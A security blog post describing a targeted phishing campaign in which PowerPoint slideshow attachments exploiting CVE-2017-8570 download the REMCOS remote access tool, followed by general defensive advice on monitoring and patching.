Just when you thought you were safe, it seems cyber criminals are taking advantage of a vulnerability in Microsoft Powerpoint’s Object Linking Embedding (OLE) interface. Cyber criminals have been using the OLE exploit to install malware on the devices of unsuspecting victims. By using this approach hackers are able to have their malware evade antivirus software. The exploit was first identified by Trend Micro and quickly reported it to the world. Apparently the vulnerability is similar to the DRIDEX banking Trojan that impacted the world earlier this year. Trend Micro notes that this is also the first time they’ve seen the use of PowerPoint as a vector of attack. This cyber attack does not just exploit Powerpoint but the negligent insider as well.
Method and Impact
Photo Credit: Trend Micro
By now you likely know that many malicious campaigns likely will being with a phishing email. In this case, it’s not a dragnet phishing campaign but a very targeted one that is intended to trick insiders to follow their orders. The exploit comes in the form of an email attachment made specifically for the electronics manufacturing industry. The email itself is disguised to appear as if it came from a cable manufacturing business partner. Which one will be dependent on the insider or information available to the attacker who crafted it. The email will specifically mention an RFQ and Specifications for a large order. The intent of the email is to get you to click the attachment out of suspicion.
The email looks like this:
Photo Credit: Trend Micro
When a user does click the email attachment, which is a PPSX file, there will be no RFQ or even any list of items. Instead they will be greeted with just the line: “CVE-2017-8570” which was the name of another vulnerability in Microsoft Office. The file being opened triggers a remote download of a malicious payload by way of PowerPoint Show animations. Once the payload is executed in its entirety, it will download a file called “logo.doc” which is an XML file that acts as a command to download and execute an executable called “RATMAN.EXE.” This is in reality a remote access tool, a legitimate one at that which would not send off any red flags. The tool is actually called REMCOS RAT and is a very powerful tool allowing for a system to be controlled by another user anywhere in the world. Included in the tool is the ability to log keys, take screenshots, record a user via webcam or on their microphone, and a few other commands.
Due to the use of PPXS files which are PowerPoint Slideshow this is not a common vector of attack. So as of right now, the vulnerability is invisible to antivirus suites. What can help prevent this attack is the use of solutions that have an emphasis on insider threats. One of the core things to do is monitor and block downloads from unknown email addresses. Additionally if you are monitoring logs of activity on your server and the endpoints on it as well, you should be able to detect outgoing activity from within your network. With an insider threat solution you could also have automated rules set up that log users off if malicious activity triggers a rule violation you’ve established. Lastly keep up to date with any patches you are notified for.
This PowerPoint vulnerability provides hackers a very dangerous and stealthy way infecting user devices that can go undetected by many organizations. This one also relies heavily on negligent insider threats. Just because this attack is specifically targeted towards the electronics manufacturing industry doesn’t mean that it can’t be reapplied for other industries or just the average user.